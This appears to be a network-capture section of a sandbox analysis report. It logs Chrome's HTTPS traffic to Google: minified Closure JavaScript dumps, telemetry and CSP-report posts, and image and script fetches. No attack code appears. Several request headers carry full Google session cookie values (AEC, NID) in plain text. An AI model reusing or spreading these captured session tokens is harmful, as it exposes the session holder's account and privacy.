2024-09-26 15:55:25 UTC	559	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0// Copyright Google LLC SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Id
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 61 2c 45 63 61 2c 46 63 61 2c 47 63 61 2c 41 63 61 2c 48 63 61 2c 42 63 61 2c 49 63 61 2c 7a 63 61 2c 4a 63 61 2c 79 63 61 2c 4b 63 61 2c 4d 63 61 2c 54 63 61 2c 56 63 61 2c 57 63 61 2c 24 63 61 2c 61 64 61 2c 65 64 61 2c 68 64 61 2c 62 64 61 2c 67 64 61 2c 66 64 61 2c 64 64 61 2c 63 64 61 2c 69 64 61 2c 6a 64 61 2c 6e 64 61 2c 70 64 61 2c 6f 64 61 2c 73 64 61 2c 74 64 61 2c 75 64 61 2c 77 64 61 2c 79 64 61 2c 78 64 61 2c 41 64 61 2c 42 64 61 2c 43 64 61 2c 45 64 61 2c 46 64 61 2c 47 64 61 2c 48 64 61 2c 49 64 61 2c 4c 64 61 2c 4d 64 61 2c 4e 64 61 2c 52 64 61 2c 51 64 61 2c 55 64 61 2c 56 64 61 2c 24 64 61 2c 61 65 61 2c 62 65 61 2c 64 65 61 2c 63 65 61 2c 66 65 61 2c 65 65 61 2c 69 65 61 2c 68 65 61 2c 6b 65 61 2c 6d 65 61 2c 70 65 61 2c 71 65 61 2c 74 Data Ascii: a,Eca,Fca,Gca,Aca,Hca,Bca,Ica,zca,Jca,yca,Kca,Mca,Tca,Vca,Wca,$ca,ada,eda,hda,bda,gda,fda,dda,cda,ida,jda,nda,pda,oda,sda,tda,uda,wda,yda,xda,Ada,Bda,Cda,Eda,Fda,Gda,Hda,Ida,Lda,Mda,Nda,Rda,Qda,Uda,Vda,$da,aea,bea,dea,cea,fea,eea,iea,hea,kea,mea,pea,qea,t
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 53 74 61 63 6b 54 72 61 63 65 29 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 68 69 73 2c 5f 2e 61 61 29 3b 65 6c 73 65 7b 76 61 72 20 63 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 3b 63 26 26 28 74 68 69 73 2e 73 74 61 63 6b 3d 63 29 7d 61 26 26 28 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 53 74 72 69 6e 67 28 61 29 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 28 74 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 5f 2e 61 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 25 73 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 2c 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 63 2b 3d 61 5b 65 5d 2b 28 65 3c 62 2e 6c 65 6e 67 74 68 3f 62 5b 65 5d 3a 22 25 73 22 29 3b 5f 2e 61 61 2e Data Ascii: StackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));b!==void 0&&(this.cause=b)};_.aaa=function(a,b){a=a.split("%s");for(var c="",d=a.length-1,e=0;e<d;e++)c+=a[e]+(e<b.length?b[e]:"%s");_.aa.
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 61 3d 76 6f 69 64 20 30 29 3b 74 68 72 6f 77 20 66 3b 7d 7d 3b 0a 5f 2e 6c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 62 3b 69 66 28 69 61 61 29 7b 69 66 28 62 26 26 28 6a 61 61 3f 21 61 2e 69 73 57 65 6c 6c 46 6f 72 6d 65 64 28 29 3a 2f 28 3f 3a 5b 5e 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 7c 5e 29 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 7c 5b 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 28 3f 21 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 29 2f 2e 74 65 73 74 28 61 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4f 22 29 3b 61 3d 28 6b 61 61 7c 7c 28 6b 61 61 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 29 29 2e 65 6e 63 6f 64 65 28 61 29 7d 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 63 3d 30 Data Ascii: a=void 0);throw f;}};_.laa=function(a,b){b=b===void 0?!1:b;if(iaa){if(b&&(jaa?!a.isWellFormed():/(?:[^\uD800-\uDBFF]\|^)[\uDC00-\uDFFF]\|[\uD800-\uDBFF](?![\uDC00-\uDFFF])/.test(a)))throw Error("O");a=(kaa\|\|(kaa=new TextEncoder)).encode(a)}else{for(var c=0
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 21 31 3a 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 75 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 6e 61 61 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 5f 2e 69 61 28 22 45 64 67 2f 22 29 7d 3b 0a 5f 2e 76 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 46 69 72 65 66 6f 78 22 29 7c 7c 5f 2e 69 61 28 22 46 78 69 4f 53 22 29 7d 3b 5f 2e 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 6a 61 28 29 7c 7c 28 5f 2e 71 61 61 28 29 3f 30 3a 5f 2e 69 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 72 61 61 28 29 7c 7c 5f 2e 74 61 Data Ascii: nction(){return _.qaa()?!1:_.ia("Edge")};_.uaa=function(){return _.qaa()?naa("Microsoft Edge"):_.ia("Edg/")};_.vaa=function(){return _.ia("Firefox")\|\|_.ia("FxiOS")};_.la=function(){return _.ia("Safari")&&!(_.ja()\|\|(_.qaa()?0:_.ia("Coast"))\|\|_.raa()\|\|_.ta
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 6c 65 73 73 43 68 72 6f 6d 65 22 5d 29 7d 72 65 74 75 72 6e 20 61 3d 3d 3d 22 46 69 72 65 66 6f 78 22 26 26 5f 2e 76 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 61 66 61 72 69 22 26 26 5f 2e 6c 61 28 29 7c 7c 61 3d 3d 3d 22 41 6e 64 72 6f 69 64 20 42 72 6f 77 73 65 72 22 26 26 5f 2e 78 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 69 6c 6b 22 26 26 5f 2e 77 61 61 28 29 3f 28 61 3d 62 5b 32 5d 29 26 26 0a 61 5b 31 5d 7c 7c 22 22 3a 22 22 7d 3b 5f 2e 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 5f 2e 71 61 61 28 29 26 26 61 21 3d 3d 22 53 69 6c 6b 22 29 7b 76 61 72 20 62 3d 5f 2e 65 61 2e 62 72 61 6e 64 73 2e 66 69 6e 64 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 63 2e 62 72 61 6e 64 3d 3d 3d 61 7d 29 3b 69 66 28 21 62 7c 7c 21 62 2e 76 65 72 73 Data Ascii: lessChrome"])}return a==="Firefox"&&_.vaa()\|\|a==="Safari"&&_.la()\|\|a==="Android Browser"&&_.xaa()\|\|a==="Silk"&&_.waa()?(a=b[2])&&a[1]\|\|"":""};_.Baa=function(a){if(_.qaa()&&a!=="Silk"){var b=_.ea.brands.find(function(c){return c.brand===a});if(!b\|\|!b.vers
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 5d 29 3b 72 65 74 75 72 6e 20 62 7c 7c 22 22 7d 3b 0a 5f 2e 4b 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 70 61 28 5f 2e 4a 61 61 28 29 2c 61 29 3e 3d 30 7d 3b 5f 2e 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 7d 3b 5f 2e 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 65 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 2d 2d 65 29 65 20 69 6e 20 64 26 26 62 2e 63 61 6c 6c 28 63 2c 64 5b 65 5d 2c 65 2c 61 29 7d 3b 5f 2e 4c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 62 3d 5f 2e 73 61 28 61 2c 62 2c 63 29 3b 72 65 Data Ascii: ]);return b\|\|""};_.Kaa=function(a){return _.pa(_.Jaa(),a)>=0};_.qa=function(a){return a[a.length-1]};_.ra=function(a,b,c){for(var d=typeof a==="string"?a.split(""):a,e=a.length-1;e>=0;--e)e in d&&b.call(c,d[e],e,a)};_.Laa=function(a,b,c){b=_.sa(a,b,c);re
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 5f 2e 41 61 28 64 29 29 7b 76 61 72 20 65 3d 61 2e 6c 65 6e 67 74 68 7c 7c 30 2c 66 3d 64 2e 6c 65 6e 67 74 68 7c 7c 30 3b 61 2e 6c 65 6e 67 74 68 3d 65 2b 66 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 61 5b 65 2b 67 5d 3d 64 5b 67 5d 7d 65 6c 73 65 20 61 2e 70 75 73 68 28 64 29 7d 7d 3b 5f 2e 55 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 61 70 70 6c 79 28 61 2c 54 61 61 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 7d 3b 54 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f 41 72 72 61 79 2e 70 72 6f 74 6f 74 Data Ascii: ments[c];if(_.Aa(d)){var e=a.length\|\|0,f=d.length\|\|0;a.length=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}};_.Uaa=function(a,b,c,d){return Array.prototype.splice.apply(a,Taa(arguments,1))};Taa=function(a,b,c){return arguments.length<=2?Array.protot
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 72 61 79 28 64 29 29 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 3d 38 31 39 32 29 7b 76 61 72 20 66 3d 54 61 61 28 64 2c 65 2c 65 2b 38 31 39 32 29 3b 66 3d 5f 2e 63 62 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 66 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 62 2e 70 75 73 68 28 66 5b 67 5d 29 7d 65 6c 73 65 20 62 2e 70 75 73 68 28 64 29 7d 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 64 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 66 61 28 5f 2e 64 61 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 77 65 62 6b 69 74 22 29 26 26 21 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 47 Data Ascii: ray(d))for(var e=0;e<d.length;e+=8192){var f=Taa(d,e,e+8192);f=_.cba.apply(null,f);for(var g=0;g<f.length;g++)b.push(f[g])}else b.push(d)}return b};_.dba=function(){return _.fa(_.da().toLowerCase(),"webkit")&&!_.ia("Edge")};_.eba=function(){return _.ia("G
2024-09-26 15:55:25 UTC	1390	IN	Data Raw: 3a 21 31 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 22 29 3b 7d 3b 73 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 42 69 67 49 6e 74 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 7d 3b 0a 5f 2e 76 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 62 61 3b 69 66 28 21 75 62 61 28 61 29 29 7b 76 61 72 20 63 2c 64 3b 62 3d 28 64 3d 28 63 3d 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 28 29 3a 62 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6f 6e 63 61 74 28 22 5c 6e 22 29 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 60 22 2b 62 2b 22 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 7d 3b 5f 2e 77 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b Data Ascii: :!1};throw Error("T");};sba=function(){return typeof BigInt==="function"};_.vba=function(a){var b=tba;if(!uba(a)){var c,d;b=(d=(c=typeof b==="function"?b():b)==null?void 0:c.concat("\n"))!=null?d:"";throw Error("U`"+b+"`"+String(a));}};_.wba=function(a){

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.16	49716	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:24 UTC	1473	OUT	POST /gen_204?s=webhp&t=cap&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,cbt.97,hst.35&opi=89978449&ts=300 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:25 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Aj9slASEwTLK4c08eBXnzA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:24 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.16	49717	142.250.184.241	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:25 UTC	624	OUT	POST /csp/gws/other-hp HTTP/1.1 Host: csp.withgoogle.com Connection: keep-alive Content-Length: 557 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/csp-report Accept: / Origin: https://www.google.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: report Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:55:25 UTC	557	OUT	Data Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 64 56 46 50 57 71 2d 6e 6c 51 31 2d 48 56 57 55 50 49 4b 33 6c 51 27 20 27 73 74 72 69 63 74 2d 64 79 6e Data Ascii: {"csp-report":{"document-uri":"https://www.google.com/","referrer":"","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"object-src 'none';base-uri 'self';script-src 'nonce-dVFPWq-nlQ1-HVWUPIK3lQ' 'strict-dyn
2024-09-26 15:55:25 UTC	1765	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 26 Sep 2024 15:55:25 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Content-Security-Policy: script-src 'report-sample' 'nonce-GHU7X8gbS0cwBf9S4PU-CQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /csp/_/CspCollectorHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /csp/_/CspCollectorHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /csp/_/CspCollectorHttp/cspreport reporting-endpoints: default="/csp/_/CspCollectorHttp/web-reports?context=eJzjktDikmLw1JBicEqfwRoCxEsiLrIeSbzIKsTD8bb92nY2gY5fHX8YlfSS8gvji1OTS4sySyp1k4sLdJPzc3JSk0vyi3QzSkoK4o0MjEwMLI1M9Aws4gsMABYCHfM" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.16	49720	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:25 UTC	1391	OUT	GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:25 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/webp Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 660 Date: Thu, 26 Sep 2024 15:55:25 GMT Expires: Thu, 26 Sep 2024 15:55:25 GMT Cache-Control: private, max-age=31536000 Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:25 UTC	660	IN	Data Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80 Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.16	49721	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:25 UTC	1319	OUT	GET /logos/doodles/2024/popcorn/rc4/popcorn.js HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
